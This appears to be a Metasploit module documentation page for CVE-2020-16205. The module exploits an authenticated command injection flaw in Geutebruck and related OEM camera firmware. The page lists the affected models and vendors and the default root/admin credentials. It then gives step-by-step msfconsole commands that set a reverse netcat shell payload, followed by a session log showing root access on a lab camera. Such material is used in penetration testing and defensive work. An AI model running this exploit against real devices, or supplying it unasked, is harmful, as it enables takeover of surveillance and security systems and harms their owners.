## Vulnerable Application The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25, firmware version 1.12.13.2 or firmware version 1.12.14.5: * Encoder and E2 Series Camera models: * G-Code: * EEC-2xxx * G-Cam: * EBC-21xx * EFD-22xx * ETHC-22xx * EWPC-22xx Many brands use the same firmware: * UDP Technology (which is also the supplier of the firmware for the other vendors) * Ganz * Visualint * Cap * THRIVE Intelligence * Sophus * VCA * TripCorps * Sprinx Technologies * Smartec * Riva This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ### Description This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the `server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`. This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to inject a new line character, followed by the command they wish to execute, at which point the server will then interpret the new string as a separate command to be executed. Successful exploitation will result in remote code execution as the `root` user. Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03. ## Verification Steps 1. Start the camera using default configuration 2. Launch msfconsole 3. Do: `use exploit/linux/http/geutebruck_testaction_exec` 4. Do: `set httpusername ` 5. Do: `set httppassword ` 6. Do: `set lhost ` 5. Do: `set rhosts ` 6. Do: `set payload cmd/unix/reverse_netcat_gaping` 7. Do: `check` to be sure the target is vulnerable 8. Do: `exploit` 9. You should get a shell ## Options The default credentials to log on the web interface are root/admin. ### HTTPUSERNAME A username used to authenticate on the admin page. **Default: root** ### HTTPPASSWORD The password of the username used to authenticate on the admin page. **Default: admin** ## Scenarios ### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ``` msf5 > use exploit/linux/http/geutebruck_testaction_exec msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping payload => cmd/unix/reverse_netcat_gaping msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root httpusername => root msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin httppassword => admin msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 lhost => 192.168.14.1 msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 rhosts => 192.168.14.58 msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit [*] Started reverse TCP handler on 192.168.14.1:4444 [*] 192.168.14.58:80 - Attempting to exploit... [*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 pwd /tmp/www_ramdisk/uapi-cgi/admin id uid=0(root) gid=0(root) uname -a Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux ```